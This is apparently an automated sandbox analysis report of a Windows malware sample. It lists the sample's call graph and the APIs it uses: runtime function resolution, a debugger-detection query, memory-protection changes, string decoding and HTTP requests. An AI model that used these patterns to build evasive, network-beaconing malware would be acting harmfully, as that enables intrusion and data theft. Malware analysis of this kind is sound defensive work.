14405->14406 14407 9541f3 14406->14407 14408 9545c0 2 API calls 14407->14408 14409 95420c 14408->14409 14410 9545c0 2 API calls 14409->14410 14411 954225 14410->14411 14412 9545c0 2 API calls 14411->14412 14413 95423e 14412->14413 14414 9545c0 2 API calls 14413->14414 14415 954257 14414->14415 14416 9545c0 2 API calls 14415->14416 14417 954270 14416->14417 14418 9545c0 2 API calls 14417->14418 14419 954289 14418->14419 14420 9545c0 2 API calls 14419->14420 14421 9542a2 14420->14421 14422 9545c0 2 API calls 14421->14422 14423 9542bb 14422->14423 14424 9545c0 2 API calls 14423->14424 14425 9542d4 14424->14425 14426 9545c0 2 API calls 14425->14426 14427 9542ed 14426->14427 14428 9545c0 2 API calls 14427->14428 14429 954306 14428->14429 14430 9545c0 2 API calls 14429->14430 14431 95431f 14430->14431 14432 9545c0 2 API calls 14431->14432 14433 954338 14432->14433 14434 9545c0 2 API calls 14433->14434 14435 954351 14434->14435 14436 9545c0 2 API calls 14435->14436 14437 95436a 14436->14437 14438 9545c0 2 API calls 14437->14438 14439 954383 14438->14439 14440 9545c0 2 API calls 14439->14440 14441 95439c 14440->14441 14442 9545c0 2 API calls 14441->14442 14443 9543b5 14442->14443 14444 9545c0 2 API calls 14443->14444 14445 9543ce 14444->14445 14446 9545c0 2 API calls 14445->14446 14447 9543e7 14446->14447 14448 9545c0 2 API calls 14447->14448 14449 954400 14448->14449 14450 9545c0 2 API calls 14449->14450 14451 954419 14450->14451 14452 9545c0 2 API calls 14451->14452 14453 954432 14452->14453 14454 9545c0 2 API calls 14453->14454 14455 95444b 14454->14455 14456 9545c0 2 API calls 14455->14456 14457 954464 14456->14457 14458 9545c0 2 API calls 14457->14458 14459 95447d 14458->14459 14460 9545c0 2 API calls 14459->14460 14461 954496 14460->14461 14462 9545c0 2 API calls 14461->14462 14463 9544af 14462->14463 14464 9545c0 2 API calls 14463->14464 14465 9544c8 14464->14465 14466 9545c0 2 API calls 14465->14466 14467 9544e1 14466->14467 14468 9545c0 2 API calls 14467->14468 
14469 9544fa 14468->14469 14470 9545c0 2 API calls 14469->14470 14471 954513 14470->14471 14472 9545c0 2 API calls 14471->14472 14473 95452c 14472->14473 14474 9545c0 2 API calls 14473->14474 14475 954545 14474->14475 14476 9545c0 2 API calls 14475->14476 14477 95455e 14476->14477 14478 9545c0 2 API calls 14477->14478 14479 954577 14478->14479 14480 9545c0 2 API calls 14479->14480 14481 954590 14480->14481 14482 9545c0 2 API calls 14481->14482 14483 9545a9 14482->14483 14484 969c10 14483->14484 14485 96a036 8 API calls 14484->14485 14486 969c20 43 API calls 14484->14486 14487 96a146 14485->14487 14488 96a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14485->14488 14486->14485 14489 96a216 14487->14489 14490 96a153 8 API calls 14487->14490 14488->14487 14491 96a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14489->14491 14492 96a298 14489->14492 14490->14489 14491->14492 14493 96a337 14492->14493 14494 96a2a5 6 API calls 14492->14494 14495 96a344 9 API calls 14493->14495 14496 96a41f 14493->14496 14494->14493 14495->14496 14497 96a4a2 14496->14497 14498 96a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14496->14498 14499 96a4dc 14497->14499 14500 96a4ab GetProcAddress GetProcAddress 14497->14500 14498->14497 14501 96a515 14499->14501 14502 96a4e5 GetProcAddress GetProcAddress 14499->14502 14500->14499 14503 96a612 14501->14503 14504 96a522 10 API calls 14501->14504 14502->14501 14505 96a67d 14503->14505 14506 96a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14503->14506 14504->14503 14507 96a686 GetProcAddress 14505->14507 14508 96a69e 14505->14508 14506->14505 14507->14508 14509 96a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14508->14509 14510 965ca3 14508->14510 14509->14510 14511 951590 14510->14511 15633 951670 14511->15633 14514 96a7a0 lstrcpy 14515 9515b5 14514->14515 14516 96a7a0 lstrcpy 14515->14516 14517 9515c7 14516->14517 
14518 96a7a0 lstrcpy 14517->14518 14519 9515d9 14518->14519 14520 96a7a0 lstrcpy 14519->14520 14521 951663 14520->14521 14522 965510 14521->14522 14523 965521 14522->14523 14524 96a820 2 API calls 14523->14524 14525 96552e 14524->14525 14526 96a820 2 API calls 14525->14526 14527 96553b 14526->14527 14528 96a820 2 API calls 14527->14528 14529 965548 14528->14529 14530 96a740 lstrcpy 14529->14530 14531 965555 14530->14531 14532 96a740 lstrcpy 14531->14532 14533 965562 14532->14533 14534 96a740 lstrcpy 14533->14534 14535 96556f 14534->14535 14536 96a740 lstrcpy 14535->14536 14566 96557c 14536->14566 14537 965643 StrCmpCA 14537->14566 14538 9656a0 StrCmpCA 14539 9657dc 14538->14539 14538->14566 14540 96a8a0 lstrcpy 14539->14540 14541 9657e8 14540->14541 14542 96a820 2 API calls 14541->14542 14544 9657f6 14542->14544 14543 96a820 lstrlen lstrcpy 14543->14566 14546 96a820 2 API calls 14544->14546 14545 965856 StrCmpCA 14547 965991 14545->14547 14545->14566 14549 965805 14546->14549 14548 96a8a0 lstrcpy 14547->14548 14550 96599d 14548->14550 14551 951670 lstrcpy 14549->14551 14552 96a820 2 API calls 14550->14552 14561 965811 14551->14561 14553 9659ab 14552->14553 14555 96a820 2 API calls 14553->14555 14554 965a0b StrCmpCA 14556 965a16 Sleep 14554->14556 14557 965a28 14554->14557 14559 9659ba 14555->14559 14556->14566 14560 96a8a0 lstrcpy 14557->14560 14558 96a740 lstrcpy 14558->14566 14562 951670 lstrcpy 14559->14562 14563 965a34 14560->14563 14561->13629 14562->14561 14565 96a820 2 API calls 14563->14565 14564 951590 lstrcpy 14564->14566 14567 965a43 14565->14567 14566->14537 14566->14538 14566->14543 14566->14545 14566->14554 14566->14558 14566->14564 14568 9652c0 25 API calls 14566->14568 14569 9651f0 20 API calls 14566->14569 14571 96578a StrCmpCA 14566->14571 14574 96593f StrCmpCA 14566->14574 14575 96a7a0 lstrcpy 14566->14575 14576 96a8a0 lstrcpy 14566->14576 14570 96a820 2 API calls 14567->14570 14568->14566 14569->14566 14572 965a52 14570->14572 14571->14566 14573 
951670 lstrcpy 14572->14573 14573->14561 14574->14566 14575->14566 14576->14566 14578 967553 GetVolumeInformationA 14577->14578 14579 96754c 14577->14579 14585 967591 14578->14585 14579->14578 14580 9675fc GetProcessHeap RtlAllocateHeap 14581 967628 wsprintfA 14580->14581 14582 967619 14580->14582 14584 96a740 lstrcpy 14581->14584 14583 96a740 lstrcpy 14582->14583 14586 965da7 14583->14586 14584->14586 14585->14580 14586->13650 14588 96a7a0 lstrcpy 14587->14588 14589 954899 14588->14589 15642 9547b0 14589->15642 14591 9548a5 14592 96a740 lstrcpy 14591->14592 14593 9548d7 14592->14593 14594 96a740 lstrcpy 14593->14594 14595 9548e4 14594->14595 14596 96a740 lstrcpy 14595->14596 14597 9548f1 14596->14597 14598 96a740 lstrcpy 14597->14598 14599 9548fe 14598->14599 14600 96a740 lstrcpy 14599->14600 14601 95490b InternetOpenA StrCmpCA 14600->14601 14602 954944 14601->14602 14603 954955 14602->14603 14604 954ecb InternetCloseHandle 14602->14604 15653 968b60 14603->15653 14606 954ee8 14604->14606 15648 959ac0 CryptStringToBinaryA 14606->15648 14607 954963 15661 96a920 14607->15661 14610 954976 14612 96a8a0 lstrcpy 14610->14612 14617 95497f 14612->14617 14613 96a820 2 API calls 14614 954f05 14613->14614 14616 96a9b0 4 API calls 14614->14616 14615 954f27 ctype 14619 96a7a0 lstrcpy 14615->14619 14618 954f1b 14616->14618 14621 96a9b0 4 API calls 14617->14621 14620 96a8a0 lstrcpy 14618->14620 14632 954f57 14619->14632 14620->14615 14622 9549a9 14621->14622 14623 96a8a0 lstrcpy 14622->14623 14624 9549b2 14623->14624 14625 96a9b0 4 API calls 14624->14625 14626 9549d1 14625->14626 14627 96a8a0 lstrcpy 14626->14627 14628 9549da 14627->14628 14629 96a920 3 API calls 14628->14629 14630 9549f8 14629->14630 14631 96a8a0 lstrcpy 14630->14631 14633 954a01 14631->14633 14632->13653 14634 96a9b0 4 API calls 14633->14634 14635 954a20 14634->14635 14636 96a8a0 lstrcpy 14635->14636 14637 954a29 14636->14637 14638 96a9b0 4 API calls 14637->14638 14639 954a48 14638->14639 14640 96a8a0 lstrcpy 
14639->14640 14641 954a51 14640->14641 14642 96a9b0 4 API calls 14641->14642 14643 954a7d 14642->14643 14644 96a920 3 API calls 14643->14644 14645 954a84 14644->14645 14646 96a8a0 lstrcpy 14645->14646 14647 954a8d 14646->14647 14648 954aa3 InternetConnectA 14647->14648 14648->14604 14649 954ad3 HttpOpenRequestA 14648->14649 14651 954ebe InternetCloseHandle 14649->14651 14652 954b28 14649->14652 14651->14604 14653 96a9b0 4 API calls 14652->14653 14654 954b3c 14653->14654 14655 96a8a0 lstrcpy 14654->14655 14656 954b45 14655->14656 14657 96a920 3 API calls 14656->14657 14658 954b63 14657->14658 14659 96a8a0 lstrcpy 14658->14659 14660 954b6c 14659->14660 14661 96a9b0 4 API calls 14660->14661 14662 954b8b 14661->14662 14663 96a8a0 lstrcpy 14662->14663 14664 954b94 14663->14664 14665 96a9b0 4 API calls 14664->14665 14666 954bb5 14665->14666 14667 96a8a0 lstrcpy 14666->14667 14668 954bbe 14667->14668 14669 96a9b0 4 API calls 14668->14669 14670 954bde 14669->14670 14671 96a8a0 lstrcpy 14670->14671 14672 954be7 14671->14672 14673 96a9b0 4 API calls 14672->14673 14674 954c06 14673->14674 14675 96a8a0 lstrcpy 14674->14675 14676 954c0f 14675->14676 14677 96a920 3 API calls 14676->14677 14678 954c2d 14677->14678 14679 96a8a0 lstrcpy 14678->14679 14680 954c36 14679->14680 14681 96a9b0 4 API calls 14680->14681 14682 954c55 14681->14682 14683 96a8a0 lstrcpy 14682->14683 14684 954c5e 14683->14684 14685 96a9b0 4 API calls 14684->14685 14686 954c7d 14685->14686 14687 96a8a0 lstrcpy 14686->14687 14688 954c86 14687->14688 14689 96a920 3 API calls 14688->14689 14690 954ca4 14689->14690 14691 96a8a0 lstrcpy 14690->14691 14692 954cad 14691->14692 14693 96a9b0 4 API calls 14692->14693 14694 954ccc 14693->14694 14695 96a8a0 lstrcpy 14694->14695 14696 954cd5 14695->14696 14697 96a9b0 4 API calls 14696->14697 14698 954cf6 14697->14698 14699 96a8a0 lstrcpy 14698->14699 14700 954cff 14699->14700 14701 96a9b0 4 API calls 14700->14701 14702 954d1f 14701->14702 14703 96a8a0 lstrcpy 14702->14703 
14704 954d28 14703->14704 14705 96a9b0 4 API calls 14704->14705 14706 954d47 14705->14706 14707 96a8a0 lstrcpy 14706->14707 14708 954d50 14707->14708 14709 96a920 3 API calls 14708->14709 14710 954d6e 14709->14710 14711 96a8a0 lstrcpy 14710->14711 14712 954d77 14711->14712 14713 96a740 lstrcpy 14712->14713 14714 954d92 14713->14714 14715 96a920 3 API calls 14714->14715 14716 954db3 14715->14716 14717 96a920 3 API calls 14716->14717 14718 954dba 14717->14718 14719 96a8a0 lstrcpy 14718->14719 14720 954dc6 14719->14720 14721 954de7 lstrlen 14720->14721 14722 954dfa 14721->14722 14723 954e03 lstrlen 14722->14723 15667 96aad0 14723->15667 14725 954e13 HttpSendRequestA 14726 954e32 InternetReadFile 14725->14726 14727 954e67 InternetCloseHandle 14726->14727 14732 954e5e 14726->14732 14729 96a800 14727->14729 14729->14651 14730 96a9b0 4 API calls 14730->14732 14731 96a8a0 lstrcpy 14731->14732 14732->14726 14732->14727 14732->14730 14732->14731 15669 96aad0 14733->15669 14735 9617c4 StrCmpCA 14736 9617cf ExitProcess 14735->14736 14737 9617d7 14735->14737 14738 9619c2 14737->14738 14739 961932 StrCmpCA 14737->14739 14740 961913 StrCmpCA 14737->14740 14741 961970 StrCmpCA 14737->14741 14742 9618f1 StrCmpCA 14737->14742 14743 961951 StrCmpCA 14737->14743 14744 96187f StrCmpCA 14737->14744 14745 96185d StrCmpCA 14737->14745 14746 9618cf StrCmpCA 14737->14746 14747 9618ad StrCmpCA 14737->14747 14748 96a820 lstrlen lstrcpy 14737->14748 14738->13655 14739->14737 14740->14737 14741->14737 14742->14737 14743->14737 14744->14737 14745->14737 14746->14737 14747->14737 14748->14737 14750 96a7a0 lstrcpy 14749->14750 14751 955979 14750->14751 14752 9547b0 2 API calls 14751->14752 14753 955985 14752->14753 14754 96a740 lstrcpy 14753->14754 14755 9559ba 14754->14755 14756 96a740 lstrcpy 14755->14756 14757 9559c7 14756->14757 14758 96a740 lstrcpy 14757->14758 14759 9559d4 14758->14759 14760 96a740 lstrcpy 14759->14760 14761 9559e1 14760->14761 14762 96a740 lstrcpy 14761->14762 14763 9559ee 
InternetOpenA StrCmpCA 14762->14763 14764 955a1d 14763->14764 14765 955fc3 InternetCloseHandle 14764->14765 14766 968b60 3 API calls 14764->14766 14767 955fe0 14765->14767 14768 955a3c 14766->14768 14769 959ac0 4 API calls 14767->14769 14770 96a920 3 API calls 14768->14770 14771 955fe6 14769->14771 14772 955a4f 14770->14772 14774 96a820 2 API calls 14771->14774 14777 95601f ctype 14771->14777 14773 96a8a0 lstrcpy 14772->14773 14778 955a58 14773->14778 14775 955ffd 14774->14775 14776 96a9b0 4 API calls 14775->14776 14779 956013 14776->14779 14781 96a7a0 lstrcpy 14777->14781 14782 96a9b0 4 API calls 14778->14782 14780 96a8a0 lstrcpy 14779->14780 14780->14777 14791 95604f 14781->14791 14783 955a82 14782->14783 14784 96a8a0 lstrcpy 14783->14784 14785 955a8b 14784->14785 14786 96a9b0 4 API calls 14785->14786 14787 955aaa 14786->14787 14788 96a8a0 lstrcpy 14787->14788 14789 955ab3 14788->14789 14790 96a920 3 API calls 14789->14790 14792 955ad1 14790->14792 14791->13661 14793 96a8a0 lstrcpy 14792->14793 14794 955ada 14793->14794 14795 96a9b0 4 API calls 14794->14795 14796 955af9 14795->14796 14797 96a8a0 lstrcpy 14796->14797 14798 955b02 14797->14798 14799 96a9b0 4 API calls 14798->14799 14800 955b21 14799->14800 14801 96a8a0 lstrcpy 14800->14801 14802 955b2a 14801->14802 14803 96a9b0 4 API calls 14802->14803 14804 955b56 14803->14804 14805 96a920 3 API calls 14804->14805 14806 955b5d 14805->14806 14807 96a8a0 lstrcpy 14806->14807 14808 955b66 14807->14808 14809 955b7c InternetConnectA 14808->14809 14809->14765 14810 955bac HttpOpenRequestA 14809->14810 14812 955fb6 InternetCloseHandle 14810->14812 14813 955c0b 14810->14813 14812->14765 14814 96a9b0 4 API calls 14813->14814 14815 955c1f 14814->14815 14816 96a8a0 lstrcpy 14815->14816 14817 955c28 14816->14817 14818 96a920 3 API calls 14817->14818 14819 955c46 14818->14819 14820 96a8a0 lstrcpy 14819->14820 14821 955c4f 14820->14821 14822 96a9b0 4 API calls 14821->14822 14823 955c6e 14822->14823 14824 96a8a0 lstrcpy 

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,005B24A0), ref: 009698A1
                    • GetProcAddress.KERNEL32(74DD0000,005B2440), ref: 009698BA
                    • GetProcAddress.KERNEL32(74DD0000,005B2218), ref: 009698D2
                    • GetProcAddress.KERNEL32(74DD0000,005B2458), ref: 009698EA
                    • GetProcAddress.KERNEL32(74DD0000,005B23C8), ref: 00969903
                    • GetProcAddress.KERNEL32(74DD0000,005B8FA8), ref: 0096991B
                    • GetProcAddress.KERNEL32(74DD0000,005A5AD0), ref: 00969933
                    • GetProcAddress.KERNEL32(74DD0000,005A5AF0), ref: 0096994C
                    • GetProcAddress.KERNEL32(74DD0000,005B2350), ref: 00969964
                    • GetProcAddress.KERNEL32(74DD0000,005B2470), ref: 0096997C
                    • GetProcAddress.KERNEL32(74DD0000,005B24D0), ref: 00969995
                    • GetProcAddress.KERNEL32(74DD0000,005B2488), ref: 009699AD
                    • GetProcAddress.KERNEL32(74DD0000,005A5BB0), ref: 009699C5
                    • GetProcAddress.KERNEL32(74DD0000,005B24B8), ref: 009699DE
                    • GetProcAddress.KERNEL32(74DD0000,005B2380), ref: 009699F6
                    • GetProcAddress.KERNEL32(74DD0000,005A5B10), ref: 00969A0E
                    • GetProcAddress.KERNEL32(74DD0000,005B22D8), ref: 00969A27
                    • GetProcAddress.KERNEL32(74DD0000,005B2248), ref: 00969A3F
                    • GetProcAddress.KERNEL32(74DD0000,005A5DD0), ref: 00969A57
                    • GetProcAddress.KERNEL32(74DD0000,005B22F0), ref: 00969A70
                    • GetProcAddress.KERNEL32(74DD0000,005A5BD0), ref: 00969A88
                    • LoadLibraryA.KERNEL32(005B2578,?,00966A00), ref: 00969A9A
                    • LoadLibraryA.KERNEL32(005B2530,?,00966A00), ref: 00969AAB
                    • LoadLibraryA.KERNEL32(005B25D8,?,00966A00), ref: 00969ABD
                    • LoadLibraryA.KERNEL32(005B25C0,?,00966A00), ref: 00969ACF
                    • LoadLibraryA.KERNEL32(005B2518,?,00966A00), ref: 00969AE0
                    • GetProcAddress.KERNEL32(75A70000,005B2560), ref: 00969B02
                    • GetProcAddress.KERNEL32(75290000,005B2590), ref: 00969B23
                    • GetProcAddress.KERNEL32(75290000,005B2548), ref: 00969B3B
                    • GetProcAddress.KERNEL32(75BD0000,005B25A8), ref: 00969B5D
                    • GetProcAddress.KERNEL32(75450000,005A5D70), ref: 00969B7E
                    • GetProcAddress.KERNEL32(76E90000,005B9018), ref: 00969B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00969BB6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: 0%[$@$[$H"[$H%[$NtQueryInformationProcess$P#[$X$[$`%[$h#[$p$[$p]Z$x%[
                    • API String ID: 2238633743-4253535198
                    • Opcode ID: 89765a3c5e9bb70d55f735cdc1102e0b94d209f34447d4bec315f06a5d448515
                    • Instruction ID: 8ce1d8a2f4ebd338933356f594560a32fa8634dd7b4b910a777b572fe37a17c5
                    • Opcode Fuzzy Hash: 89765a3c5e9bb70d55f735cdc1102e0b94d209f34447d4bec315f06a5d448515
                    • Instruction Fuzzy Hash: D1A12BB55102409FD344EFA9EF89A663BF9F78D301714851BA609C3274DE39A841CBE3

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0095479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954765
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 0a44135ab0eb62a8701c41f34df6752697aa2cbe86868db51936298af61303d4
                    • Instruction ID: d6eb90a5debfa2df6c81b51b45a777d1b29bd664fe99282bab39d9fd7d6ac8da
                    • Opcode Fuzzy Hash: 0a44135ab0eb62a8701c41f34df6752697aa2cbe86868db51936298af61303d4
                    • Instruction Fuzzy Hash: 4B4136616C360CAAE674B7A68847EEF77539FC271EF529840A8C862290CFF065085793

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • InternetOpenA.WININET(00970DFE,00000001,00000000,00000000,00000000), ref: 009562E1
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956335
                    • HttpOpenRequestA.WININET(00000000,GET,?,005BE380,00000000,00000000,00400100,00000000), ref: 00956385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009563BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009563D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009563FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0095646D
                    • InternetCloseHandle.WININET(00000000), ref: 009564EF
                    • InternetCloseHandle.WININET(00000000), ref: 009564F9
                    • InternetCloseHandle.WININET(00000000), ref: 00956503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: 9c7aa6552b214c897008999108c75b470cc8a04b2c378d29198254c0d9f118bc
                    • Instruction ID: 969521f7494b818dc9b86586d5e99c39a245d4c609939450835f65860d34fbe1
                    • Opcode Fuzzy Hash: 9c7aa6552b214c897008999108c75b470cc8a04b2c378d29198254c0d9f118bc
